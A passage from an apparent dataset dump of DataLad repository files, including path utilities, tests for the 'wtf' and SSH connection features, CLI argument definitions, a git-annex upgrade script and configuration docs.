_get_unicode_robust_version(op.isabs)\njoin = op.join\nlexists = _get_unicode_robust_version(op.lexists)\nnormpath = op.normpath\npardir = op.pardir\npathsep = op.pathsep\nrelpath = op.relpath\nrealpath = _get_unicode_robust_version(op.realpath)\nsep = op.sep\n\n\ndef robust_abspath(p: str | Path) -> str:\n \"\"\"A helper which would not fail if p is relative and we are in non-existing directory\n\n It will rely on getpwd, which would rely on $PWD env variable to report\n the path. 
Desired for improved resilience during e.g. reporting as in\n https://github.com/datalad/datalad/issues/2787\n \"\"\"\n try:\n return abspath(p)\n except OSError:\n if not isabs(p):\n try:\n os.getcwd()\n except Exception:\n return normpath(join(getpwd(), p))\n # if no exception raised it was not the reason, raise original\n raise\n\n\ndef split_ext(filename: str) -> tuple[str, str]:\n \"\"\"Use git-annex's splitShortExtensions rule for splitting extensions.\n\n Parameters\n ----------\n filename : str\n\n Returns\n -------\n A tuple with (root, extension)\n\n Examples\n --------\n >>> from datalad.local.addurls import split_ext\n >>> split_ext(\"filename.py\")\n ('filename', '.py')\n\n >>> split_ext(\"filename.tar.gz\")\n ('filename', '.tar.gz')\n\n >>> split_ext(\"filename.above4chars.ext\")\n ('filename.above4chars', '.ext')\n \"\"\"\n parts = filename.split(\".\")\n if len(parts) == 1:\n return filename, \"\"\n\n tail = list(dropwhile(lambda x: len(x) < 5,\n reversed(parts[1:])))\n\n file_parts = parts[:1] + tail[::-1]\n ext_parts = parts[1+len(tail):]\n return \".\".join(file_parts), \".\" + \".\".join(ext_parts)\n\n\ndef get_parent_paths(paths: list[str], parents: list[str], only_with_parents: bool = False, *, sep: str = '/') -> list[str]:\n \"\"\"Given a list of children paths, return their parent paths among parents\n or their own path if there is no known parent. A path is also considered its\n own parent (haven't you watched Predestination?) ;)\n\n All paths should be relative, not pointing outside (not starting\n with ../), and normalized (no // or dir/../dir and alike). Only minimal\n sanity checking of values is done. By default paths are considered to be\n POSIX. Use 'sep' kwarg to set to `os.sep` to provide OS specific handling.\n\n Accent is made on performance to avoid O(len(paths) * len(parents))\n runtime. ATM should be typically less than O(len(paths) * len(log(parents)))\n\n Initial intended use - for a list of paths in the repository\n to provide their paths as files/submodules known to that repository, to\n overcome difference in ls-tree and ls-files, where ls-files outputs nothing\n for paths within submodules.\n It is coded, so it could later be applied even whenever there are nested\n parents, e.g. parents = ['sub', 'sub/sub'] and then the \"deepest\" parent\n is selected\n\n Parameters\n ----------\n parents: list of str\n paths: list of str\n only_with_parents: bool, optional\n If set to True, return a list of only parent paths where that path had\n a parent\n sep: str, optional\n Path separator. By default - '/' and thus treating paths as POSIX.\n If you are processing OS-specific paths (for both `parents` and `paths`),\n specify `sep=os.sep`.\n\n Returns\n -------\n A list of paths (without duplicates), where some entries replaced with\n their \"parents\" without duplicates. So for 'a/b' and 'a/c' with a being\n among parents, there will be a single 'a'\n \"\"\"\n # Let's do an early check even though then we would skip the checks on paths\n # being relative etc\n if not parents:\n return [] if only_with_parents else paths\n\n # We will create a lookup for known parent lengths\n parent_set = set(parents) # O(log(len(parents))) lookup\n\n # Will be used in sanity checking that we got consistently used separators, i.e.\n # not mixing non-POSIX paths and POSIX parents\n asep = {'/': '\\\\', '\\\\': '/'}[sep]\n\n # rely on path[:n] be quick, and len(parent_lengths) << len(parent_set)\n # when len(parent_set) is large. 
We will also bail checking any parent of\n # the length if at that length path has no directory boundary ('/').\n #\n # Create mapping for each length of\n # parent path to list of parents with that length\n parent_lengths_map: dict[int, set[str]] = _defaultdict(set)\n for parent in parent_set:\n _get_parent_paths_check(parent, sep, asep)\n parent_lengths_map[len(parent)].add(parent)\n\n # Make it ordered in the descending order so we select the deepest/longest parent\n # and store them as sets for faster lookup.\n # Could be an ordered dict but no need\n parent_lengths = [(l, parent_lengths_map[l]) for l in sorted(parent_lengths_map, reverse=True)]\n\n res = []\n seen = set()\n\n for path in paths: # O(len(paths)) - unavoidable but could be parallelized!\n # Sanity check -- should not be too expensive\n _get_parent_paths_check(path, sep, asep)\n for parent_length, parents_ in parent_lengths: # O(len(parent_lengths))\n if (len(path) < parent_length) or (len(path) > parent_length and path[parent_length] != sep):\n continue # no directory deep enough\n candidate_parent = path[:parent_length]\n if candidate_parent in parents_: # O(log(len(parent_set))) but expected one less due to per length handling\n if candidate_parent not in seen:\n res.append(candidate_parent)\n seen.add(candidate_parent)\n break # it is!\n else: # no hits\n if not only_with_parents:\n if path not in seen:\n res.append(path)\n seen.add(path)\n\n return res\n\n\ndef get_filtered_paths_(paths: Iterable[str|Path], filter_paths: Iterable[str | Path],\n *, include_within_path: bool = False) \\\n -> Iterator[str]:\n \"\"\"Among paths (or Path objects) select the ones within filter_paths.\n\n All `paths` and `filter_paths` must be relative and POSIX.\n\n In case of `include_with_path=True`, if a `filter_path` points to some path\n under a `path` within `paths`, that path would be returned as well, e.g.\n `path` 'submod' would be returned if there is a `filter_path` 'submod/subsub/file'.\n\n Complexity is O(N*log(N)), where N is the largest of the lengths of `paths`\n or `filter_paths`.\n\n Yields\n ------\n paths, sorted (so order is not preserved), which reside under 'filter_paths' or\n path within 'filter_paths' is under that path.\n \"\"\"\n # do conversion and sanity checks, O(N)\n def _harmonize_paths(l: Iterable[str | Path]) -> list[tuple[str, ...]]:\n ps = []\n for p in l:\n pp = PurePosixPath(p)\n if pp.is_absolute():\n raise ValueError(f\"Got absolute path {p}, expected relative\")\n if pp.parts and pp.parts[0] == '..':\n raise ValueError(f\"Path {p} leads outside\")\n ps.append(pp.parts) # store parts\n return sorted(ps) # O(N * log(N))\n\n paths_parts = _harmonize_paths(paths)\n filter_paths_parts = _harmonize_paths(filter_paths)\n\n # we will pretty much \"scroll\" through sorted paths and filter_paths at the same time\n for path_parts in paths_parts:\n while filter_paths_parts:\n filter_path_parts = filter_paths_parts[0]\n l = min(len(path_parts), len(filter_path_parts))\n # if common part is \"greater\" in the path -- we can go to the next \"filter\"\n if filter_path_parts[:l] < path_parts[:l]:\n # get to the next one\n filter_paths_parts = filter_paths_parts[1:]\n else:\n break # otherwise -- consider this one!\n else:\n # no filter path left - the other paths cannot be the selected ones\n break\n if include_within_path:\n # if one identical or subpath of another one -- their parts match in the beginning\n # and we will just reuse that 'l'\n pass\n else:\n # if all components of the filter match, for that we also 
add len(path_parts) check below\n l = len(filter_path_parts)\n if len(path_parts) >= l and (path_parts[:l] == filter_path_parts[:l]):\n yield '/'.join(path_parts)\n\n\ndef _get_parent_paths_check(path: str, sep: str, asep: str) -> None:\n \"\"\"A little helper for get_parent_paths\"\"\"\n if isabs(path) or path.startswith(pardir + sep) or path.startswith(curdir + sep):\n raise ValueError(\"Expected relative within directory paths, got %r\" % path)\n if sep+sep in path:\n raise ValueError(f\"Expected normalized paths, got {path} containing '{sep+sep}'\")\n if asep in path:\n raise ValueError(f\"Expected paths with {sep} as separator, got {path} containing '{asep}'\")\n" }, { "alpha_fraction": 0.5830287337303162, "alphanum_fraction": 0.5865247249603271, "avg_line_length": 36.45833206176758, "blob_id": "983c98bd27a0ef54243d3cae8a35e7f279459a7c", "content_id": "82b1c02a5cd44ac967c26abea7cd5ca8b9458583", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6293, "license_type": "permissive", "max_line_length": 92, "num_lines": 168, "path": "/datalad/local/tests/test_wtf.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test wtf\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad import __version__\nfrom datalad.api import (\n create,\n wtf,\n)\nfrom datalad.local.wtf import (\n _HIDDEN,\n SECTION_CALLABLES,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_greater,\n assert_in,\n assert_not_in,\n chpwd,\n eq_,\n ok_startswith,\n skip_if_no_module,\n swallow_outputs,\n with_tree,\n)\nfrom datalad.utils import ensure_unicode\n\nfrom datalad.support.external_versions import external_versions\n\n\n@with_tree({OBSCURE_FILENAME: {}})\ndef test_wtf(topdir=None):\n path = opj(topdir, OBSCURE_FILENAME)\n # smoke test for now\n with swallow_outputs() as cmo:\n wtf(dataset=path, on_failure=\"ignore\")\n assert_not_in('## dataset', cmo.out)\n assert_in('## configuration', cmo.out)\n # Those sections get sensored out by default now\n assert_not_in('user.name: ', cmo.out)\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf()\n assert_not_in('## dataset', cmo.out)\n assert_in('## configuration', cmo.out)\n # now with a dataset\n ds = create(path)\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path)\n assert_in('## configuration', cmo.out)\n assert_in('## dataset', cmo.out)\n assert_in(u'path: {}'.format(ds.path),\n ensure_unicode(cmo.out))\n assert_in('branches', cmo.out)\n assert_in(DEFAULT_BRANCH+'@', cmo.out)\n assert_in('git-annex@', cmo.out)\n\n # and if we run with all sensitive\n for sensitive in ('some', True):\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path, sensitive=sensitive)\n # we fake those for tests anyways, but we do show cfg in this mode\n # and explicitly not showing them\n assert_in('user.name: %s' % _HIDDEN, cmo.out)\n\n with swallow_outputs() as cmo:\n wtf(dataset=ds.path, sensitive='all')\n assert_not_in(_HIDDEN, cmo.out) # all is shown\n 
assert_in('user.name: ', cmo.out)\n if external_versions['psutil']:\n # filesystems detail should be reported\n assert_in('max_pathlength:', cmo.out)\n else:\n assert_in(\"Hint: install psutil\", cmo.out)\n\n # Sections selection\n #\n # If we ask for no sections and there is no dataset\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=[])\n assert_not_in('## dataset', cmo.out)\n for s in SECTION_CALLABLES:\n assert_not_in('## %s' % s.lower(), cmo.out.lower())\n\n # ask for a selected set\n secs = ['git-annex', 'configuration']\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=secs)\n for s in SECTION_CALLABLES:\n (assert_in if s in secs else assert_not_in)(\n '## %s' % s.lower(), cmo.out.lower()\n )\n # order should match our desired one, not alphabetical\n # but because of https://github.com/datalad/datalad/issues/3915\n # alphanum is now desired\n assert cmo.out.index('## git-annex') > cmo.out.index('## configuration')\n\n # not achievable from cmdline is to pass an empty list of sections.\n with chpwd(path):\n with swallow_outputs() as cmo:\n wtf(sections=[])\n eq_(cmo.out.rstrip(), '# WTF')\n\n # and we could decorate it nicely for embedding e.g. into github issues\n with swallow_outputs() as cmo:\n wtf(sections=['dependencies'], decor='html_details')\n ok_startswith(cmo.out, '<details><summary>DataLad %s WTF' % __version__)\n assert_in('## dependencies', cmo.out)\n\n # short flavor\n with swallow_outputs() as cmo:\n wtf(flavor='short')\n assert_in(\"- datalad: version=%s\" % __version__, cmo.out)\n assert_in(\"- dependencies: \", cmo.out)\n eq_(len(cmo.out.splitlines()), 4) # #WTF, datalad, dependencies, trailing new line\n\n with swallow_outputs() as cmo:\n wtf(flavor='short', sections='*')\n assert_greater(len(cmo.out.splitlines()), 10) # many more\n\n # check that wtf of an unavailable section yields impossible result (#6712)\n res = wtf(sections=['murkie'], on_failure='ignore')\n eq_(res[0][\"status\"], \"impossible\")\n # and we do not get double WTF reporting, while still rendering other sections ok\n with swallow_outputs() as cmo:\n res = wtf(sections=['system', 'murkie', 'environment'], on_failure='ignore')\n assert cmo.out.count('# WTF') == 1 # report produced only ones\n # and we still have other sections requested before or after\n assert cmo.out.count('## system') == 1\n assert cmo.out.count('## environment') == 1\n eq_(res[0][\"status\"], \"impossible\")\n\n # should result only in '# WTF'\n skip_if_no_module('pyperclip')\n\n # verify that it works correctly in the env/platform\n import pyperclip\n with swallow_outputs() as cmo:\n try:\n pyperclip.copy(\"xxx\")\n pyperclip_works = pyperclip.paste().strip() == \"xxx\"\n wtf(dataset=ds.path, clipboard=True)\n except (AttributeError, pyperclip.PyperclipException) as exc:\n # AttributeError could come from pyperclip if no DISPLAY\n raise SkipTest(str(exc))\n assert_in(\"WTF information of length\", cmo.out)\n assert_not_in('user.name', cmo.out)\n if not pyperclip_works:\n # Some times does not throw but just fails to work\n raise SkipTest(\n \"Pyperclip seems to be not functioning here correctly\")\n assert_not_in('user.name', pyperclip.paste())\n assert_in(_HIDDEN, pyperclip.paste()) # by default no sensitive info\n assert_in(\"cmd:annex:\", pyperclip.paste()) # but the content is there\n" }, { "alpha_fraction": 0.656105637550354, "alphanum_fraction": 0.6574257612228394, "avg_line_length": 34.23255920410156, "blob_id": "f07d8257e3f7ec09c521d95a7b25ac33ee0a942b", "content_id": 
"a711c3a8cfed6330c84426fbef3bcfa8e564e414", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1515, "license_type": "permissive", "max_line_length": 112, "num_lines": 43, "path": "/datalad/resources/procedures/cfg_noannex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to uninit Git-annex (if initialized), and create/save .noannex file to prevent annex initialization\n\nIf there are git-annex'ed files already, git annex uninit and this procedure will fail.\n\n\"\"\"\n\nfrom datalad import lgr\nfrom datalad.distribution.dataset import require_dataset\nfrom datalad.support.annexrepo import AnnexRepo\n\n\ndef no_annex(ds):\n ds = require_dataset(\n ds,\n check_installed=True,\n purpose='configuration')\n\n if isinstance(ds.repo, AnnexRepo):\n repo = ds.repo\n # TODO: if procedures can have options -- add --force handling/passing\n #\n # annex uninit unlocks files for which there is content (nice) but just proceeds\n # and leaves broken symlinks for files without content. For the current purpose\n # of this procedure we just prevent \"uninit\" of any annex with some files already\n # annexed.\n if any(repo.call_annex_items_(['whereis', '--all'])):\n raise RuntimeError(\"Annex has some annexed files, unsafe\")\n # remove annex\n repo.call_annex(['uninit'])\n\n noannex_file = ds.pathobj / \".noannex\"\n if not noannex_file.exists():\n lgr.info(\"Creating and committing a .noannex file\")\n noannex_file.touch()\n ds.save(noannex_file,\n message=\"Added .noannex to prevent accidental initialization of git-annex\",\n result_renderer='disabled')\n\n\nif __name__ == '__main__':\n import sys\n no_annex(sys.argv[1])\n" }, { "alpha_fraction": 0.6930860280990601, "alphanum_fraction": 0.7082630395889282, "avg_line_length": 28.649999618530273, "blob_id": "68b4edba306f6ac4501373c7f98981be39880456", "content_id": "bde8a24091803dfb7b27d8a745114fab60585040", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 593, "license_type": "permissive", "max_line_length": 93, "num_lines": 20, "path": "/tools/upgrade-annex-osx.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\ncurver=$(git annex version | awk '/version:/{print $3;}' | sed -e 's,-.*,,g')\nannexdir=/Applications/git-annex.app\ncurverdir=$annexdir.$curver\n\nrm -f git-annex.dmg\n# release\n# curl -O https://downloads.kitenet.net/git-annex/OSX/current/10.10_Yosemite/git-annex.dmg\n# daily build\ncurl -O https://downloads.kitenet.net/git-annex/autobuild/x86_64-apple-yosemite/git-annex.dmg\n\nhdiutil attach git-annex.dmg \n\nif [ ! -z \"$curver\" ] && [ ! 
-e \"$curverdir\" ]; then\n\tmv $annexdir $curverdir\nfi\n\nrsync -a /Volumes/git-annex/git-annex.app /Applications/\nhdiutil detach /Volumes/git-annex/\n" }, { "alpha_fraction": 0.5630457997322083, "alphanum_fraction": 0.5647311210632324, "avg_line_length": 42.80537033081055, "blob_id": "94906f6ccad7f556191ca7b21a68ab74894c31b5", "content_id": "eeae3436203d3e78030bf3e9ae1ed8eaad2b0a77", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6527, "license_type": "permissive", "max_line_length": 91, "num_lines": 149, "path": "/datalad/cli/common_args.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n__all__ = ['common_args']\n\nfrom .helpers import (\n HelpAction,\n LogLevelAction,\n)\nfrom datalad.interface.base import eval_params\nfrom datalad.utils import ensure_unicode\n\n\n_log_level_names = ['critical', 'error', 'warning', 'info', 'debug']\n\n# argument spec template\n#<name>=(\n# <id_as_positional>, <id_as_option>\n# {<ArgumentParser.add_arguments_kwargs>}\n#)\n\ncommon_args = dict(\n cfg_overrides=(\n ('-c',),\n dict(action='append',\n dest='cfg_overrides',\n metavar='(:name|name=value)',\n help=\"\"\"specify configuration setting overrides. They override any\n configuration read from a file. A configuration can also be\n unset temporarily by prefixing its name with a colon (':'), e.g. ':user.name'.\n Overrides specified here may be overridden themselves by\n configuration settings declared as environment variables.\n \"\"\")),\n change_path=(\n ('-C',),\n dict(action='append',\n dest='change_path',\n metavar='PATH',\n help=\"\"\"run as if datalad was started in <path> instead\n of the current working directory. When multiple -C options are given,\n each subsequent non-absolute -C <path> is interpreted relative to the\n preceding -C <path>. This option affects the interpretations of the\n path names in that they are made relative to the working directory\n caused by the -C option\"\"\")),\n cmd=(\n ('--cmd',),\n dict(dest='_',\n action='store_true',\n help=\"\"\"syntactical helper that can be used to end the list of\n global command line options before the subcommand label. Options\n taking an arbitrary number of arguments may require to be followed\n by a single --cmd in order to enable identification of the\n subcommand.\"\"\")),\n help=(\n ('-h', '--help', '--help-np'),\n dict(nargs=0, action=HelpAction,\n help=\"\"\"show this help message. --help-np forcefully disables\n the use of a pager for displaying the help message\"\"\")),\n log_level=(\n ('-l', '--log-level'),\n dict(action=LogLevelAction,\n choices=_log_level_names + [str(x) for x in range(1, 10)],\n metavar=\"LEVEL\",\n default='warning',\n help=\"\"\"set logging verbosity level. Choose among %s. Also you can\n specify an integer <10 to provide even more debugging\n information\"\"\" % ', '.join(_log_level_names))),\n # CLI analog of eval_params.on_failure. 
TODO: dedup\n on_failure=(\n ('--on-failure',),\n dict(dest='common_on_failure',\n # setting the default to None here has the following implications\n # - the global default is solely defined in\n # datalad.interface.common_opts.eval_params and is in-effect for\n # Python API and CLI\n # - this global default is written to each command Interface class\n # and can be overridden there on a per-command basis, with such\n # override being honored by both APIs\n # - the CLI continues to advertise the choices defined below as\n # the possible values for '--on-failure'\n # - the Python docstring reflects a possibly command-specific\n # default\n default=None,\n choices=['ignore', 'continue', 'stop'],\n help=\"\"\"when an operation fails: 'ignore' and continue with\n remaining operations, the error is logged but does not lead to a\n non-zero exit code of the command; 'continue' works like 'ignore',\n but an error causes a non-zero exit code; 'stop' halts on first\n failure and yields non-zero exit code. A failure is any result\n with status 'impossible' or 'error'. [Default: '%s', but\n individual commands may define an alternative default]\"\"\"\n % eval_params['on_failure'].cmd_kwargs['default'])),\n report_status=(\n ('--report-status',),\n dict(dest='common_report_status',\n choices=['success', 'failure', 'ok', 'notneeded', 'impossible',\n 'error'],\n help=\"\"\"constrain command result report to records matching the\n given status. 'success' is a synonym for 'ok' OR 'notneeded',\n 'failure' stands for 'impossible' OR 'error'.\"\"\")),\n report_type=(\n ('--report-type',),\n dict(dest='common_report_type',\n choices=['dataset', 'file'],\n action='append',\n help=\"\"\"constrain command result report to records matching the\n given type. Can be given more than once to match multiple types.\n \"\"\")),\n # CLI analog of eval_params.result_renderer but with `<template>` handling\n # and a different default: in Python API we have None as default and do not\n # render the results but return them. 
In CLI we default to \"default\"\n # renderer\n result_renderer=(\n # this should really have --result-renderer for homogeneity with the\n # Python API, but adding it in addition makes the help output\n # monsterous\n ('-f', '--output-format'), # '--result-renderer',\n dict(dest='common_result_renderer',\n default='tailored',\n type=ensure_unicode,\n metavar=\"{generic,json,json_pp,tailored,disabled,'<template>'}\",\n help=eval_params['result_renderer']._doc \\\n + \" [Default: '%(default)s']\")),\n)\n\nif __debug__:\n common_args.update(\n dbg=(\n ('--dbg',),\n dict(action='store_true',\n dest='common_debug',\n help=\"enter Python debugger for an uncaught exception\",\n )),\n idbg=(\n ('--idbg',),\n dict(action='store_true',\n dest='common_idebug',\n help=\"enter IPython debugger for an uncaught exception\")),\n )\n" }, { "alpha_fraction": 0.5700280070304871, "alphanum_fraction": 0.5770308375358582, "avg_line_length": 41, "blob_id": "d4c2929d8ab2aa7d21f6a55448a69e5f80a02376", "content_id": "744b32eff65c3f56fa2381995f553e9a65a7f730", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 714, "license_type": "permissive", "max_line_length": 87, "num_lines": 17, "path": "/datalad/distribution/create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Import shim to ease the transition after the move under distributed/\"\"\"\n\nimport warnings\nwarnings.warn(\n \"CreateSiblingGithub has been moved to \"\n \"datalad.distributed.create_sibling_github. Please adjust the import.\",\n DeprecationWarning)\n\nfrom datalad.distributed.create_sibling_github import CreateSiblingGithub\n" }, { "alpha_fraction": 0.744830846786499, "alphanum_fraction": 0.744830846786499, "avg_line_length": 36.33333206176758, "blob_id": "b6e0317980cee47568b173298a59e142c7590cb4", "content_id": "443d1e4504695723e12d7db3ebfd93d99cb147d9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2128, "license_type": "permissive", "max_line_length": 78, "num_lines": 57, "path": "/docs/source/config.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. _configuration:\n\nConfiguration\n*************\n\nDataLad uses the same configuration mechanism and syntax as Git itself.\nConsequently, datalad can be configured using the :command:`git config`\ncommand. Both a *global* user configuration (typically at\n:file:`~/.gitconfig`), and a *local* repository-specific configuration\n(:file:`.git/config`) are inspected.\n\nIn addition, datalad supports a persistent dataset-specific configuration.\nThis configuration is stored at :file:`.datalad/config` in any dataset. As it\nis part of a dataset, settings stored there will also be in effect for any\nconsumer of such a dataset. 
Both *global* and *local* settings on a particular\nmachine always override configuration shipped with a dataset.\n\nAll datalad-specific configuration variables are prefixed with ``datalad.``.\n\nIt is possible to override or amend the configuration using environment\nvariables. Any variable with a name that starts with ``DATALAD_`` will\nbe available as the corresponding ``datalad.`` configuration variable,\nreplacing any ``__`` (two underscores) with a hyphen, then any ``_``\n(single underscore) with a dot, and finally converting all letters to\nlower case. Values from environment variables take precedence over\nconfiguration file settings.\n\nIn addition, the ``DATALAD_CONFIG_OVERRIDES_JSON`` environment variable can\nbe set to a JSON record with configuration values. This is\nparticularly useful for options that aren't accessible through the\nnaming scheme described above (e.g., an option name that includes an\nunderscore).\n\nThe following sections provide a (non-exhaustive) list of settings honored\nby datalad. They are categorized according to the scope they are typically\nassociated with.\n\n\nGlobal user configuration\n=========================\n\n.. include:: generated/cfginfo/global.rst.in\n\nLocal repository configuration\n==============================\n\n.. include:: generated/cfginfo/local.rst.in\n\nSticky dataset configuration\n=============================\n\n.. include:: generated/cfginfo/dataset.rst.in\n\nMiscellaneous configuration\n===========================\n\n.. include:: generated/cfginfo/misc.rst.in\n" }, { "alpha_fraction": 0.6377817988395691, "alphanum_fraction": 0.6429244875907898, "avg_line_length": 34.57012176513672, "blob_id": "cdb0d436e46d1f18cab113f5477cd569f46ad5f8", "content_id": "aeb653730301c86b708e8587fd43fc05bf4b44dd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11667, "license_type": "permissive", "max_line_length": 87, "num_lines": 328, "path": "/datalad/support/tests/test_sshconnector.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test classes SSHConnection and SSHManager\n\n\"\"\"\n\nimport logging\nimport os.path as op\nfrom os.path import (\n exists,\n getmtime,\n isdir,\n)\nfrom os.path import join as opj\n\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_raises,\n eq_,\n get_most_obscure_supported_name,\n get_ssh_port,\n ok_,\n patch_config,\n skip_if_on_windows,\n skip_nomultiplex_ssh,\n skip_ssh,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\nfrom ..sshconnector import (\n MultiplexSSHConnection,\n MultiplexSSHManager,\n NoMultiplexSSHConnection,\n SSHConnection,\n SSHManager,\n get_connection_hash,\n sh_quote,\n)\n\n# Some tests test the internals and assumptions of multiplex connections\n_ssh_manager_is_multiplex = SSHManager is MultiplexSSHManager\n\n\n@skip_ssh\ndef test_ssh_get_connection():\n\n manager = SSHManager()\n if _ssh_manager_is_multiplex:\n assert manager._socket_dir is None, \\\n \"Should be unset upon initialization. 
Got %s\" % str(manager._socket_dir)\n c1 = manager.get_connection('ssh://datalad-test')\n\n if _ssh_manager_is_multiplex:\n assert manager._socket_dir, \"Should be set after interactions with the manager\"\n assert_is_instance(c1, MultiplexSSHConnection)\n # subsequent call returns the very same instance:\n ok_(manager.get_connection('ssh://datalad-test') is c1)\n else:\n assert_is_instance(c1, NoMultiplexSSHConnection)\n\n # fail on malformed URls (meaning: our fancy URL parser can't correctly\n # deal with them):\n #assert_raises(ValueError, manager.get_connection, 'localhost')\n # we now allow those simple specifications of host to get_connection\n c2 = manager.get_connection('datalad-test')\n assert_is_instance(c2, SSHConnection)\n\n # but should fail if it looks like something else\n assert_raises(ValueError, manager.get_connection, 'datalad-test/')\n assert_raises(ValueError, manager.get_connection, ':datalad-test')\n\n # we can do what urlparse cannot\n # assert_raises(ValueError, manager.get_connection, 'someone@localhost')\n # next one is considered a proper url by urlparse (netloc:'',\n # path='/localhost), but eventually gets turned into SSHRI(hostname='ssh',\n # path='/localhost') -- which is fair IMHO -> invalid test\n # assert_raises(ValueError, manager.get_connection, 'ssh:/localhost')\n\n manager.close()\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tree(tree={'f0': 'f0', 'f1': 'f1'})\n@with_tempfile(suffix=get_most_obscure_supported_name(),\n content=\"1\")\ndef test_ssh_open_close(tmp_path=None, tfile1=None):\n\n manager = SSHManager()\n\n socket_path = None\n if _ssh_manager_is_multiplex:\n socket_path = opj(str(manager.socket_dir),\n get_connection_hash('datalad-test'))\n # TODO: facilitate the test when it didn't exist\n existed_before = exists(socket_path)\n\n c1 = manager.get_connection('ssh://datalad-test')\n c1.open()\n if socket_path:\n # control master exists for sure now\n ok_(exists(socket_path))\n\n # use connection to execute remote command:\n # we list explicitly local HOME since we override it in module_setup\n #\n # Note: Use realpath() below because we know that the resolved temporary\n # test directory exists on the target (many tests rely on that), but it\n # doesn't necessarily have the unresolved variant.\n out, err = c1('ls -a {}'.format(sh_quote(op.realpath(tmp_path))))\n remote_ls = [entry for entry in out.splitlines()\n if entry != '.' 
and entry != '..']\n eq_(set(remote_ls), {\"f0\", \"f1\"})\n if socket_path:\n ok_(exists(socket_path))\n\n # now test for arguments containing spaces and other pleasant symbols\n out, err = c1('ls -l {}'.format(sh_quote(tfile1)))\n assert_in(tfile1, out)\n # on a crippled FS it will actually say something like\n # Control socket connect(...6258b3a7): Connection refused\\r\\n'\n # but still work.\n #eq_(err, '')\n\n c1.close()\n if socket_path:\n # control master doesn't exist anymore:\n ok_(exists(socket_path) == existed_before)\n\n\n@skip_nomultiplex_ssh\ndef test_ssh_manager_close():\n\n manager = SSHManager()\n\n # check for previously existing sockets:\n existed_before_1 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test')))\n existed_before_2 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2')))\n\n manager.get_connection('ssh://datalad-test').open()\n manager.get_connection('ssh://datalad-test2').open()\n\n if existed_before_1 and existed_before_2:\n # we need one connection to be closed and therefore being opened\n # by `manager`\n manager.get_connection('ssh://datalad-test').close()\n manager.get_connection('ssh://datalad-test').open()\n\n ok_(exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test'))))\n ok_(exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2'))))\n\n manager.close()\n\n still_exists_1 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test')))\n still_exists_2 = exists(opj(str(manager.socket_dir),\n get_connection_hash('datalad-test2')))\n\n eq_(existed_before_1, still_exists_1)\n eq_(existed_before_2, still_exists_2)\n\n\n@with_tempfile\ndef test_ssh_manager_close_no_throw(bogus_socket=None):\n manager = MultiplexSSHManager()\n\n class bogus:\n def close(self):\n raise Exception(\"oh I am so 